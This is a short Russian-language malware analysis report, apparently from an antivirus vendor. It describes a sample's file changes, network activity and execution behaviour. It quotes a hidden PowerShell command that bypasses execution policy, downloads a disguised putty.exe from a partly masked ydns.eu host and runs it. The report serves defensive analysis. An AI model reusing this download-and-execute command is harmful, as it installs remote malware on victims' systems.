Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://le#######kokkiskikinew.ydns.eu/putty.exe как %appdata%\putty.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abdtfhghgdghghВќ.sct
- %APPDATA%\putty.exe
- %TEMP%\putty_2500_0.chm
- %APPDATA%\microsoft\html help\hh.dat
- %TEMP%\imt820a.tmp
Сетевая активность
Подключается к
- 'le#######kokkiskikinew.ydns.eu':80
TCP
Запросы HTTP GET
- http://le#######kokkiskikinew.ydns.eu/putty.exe
UDP
- DNS ASK le#######kokkiskikinew.ydns.eu
Другое
Ищет следующие окна
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
Создает и запускает на исполнение
- '%APPDATA%\putty.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://le#######kokkiskikinew.ydns.eu/putty.exe','%APPDATA%\putty.exe');Start...' (со скрытым окном)
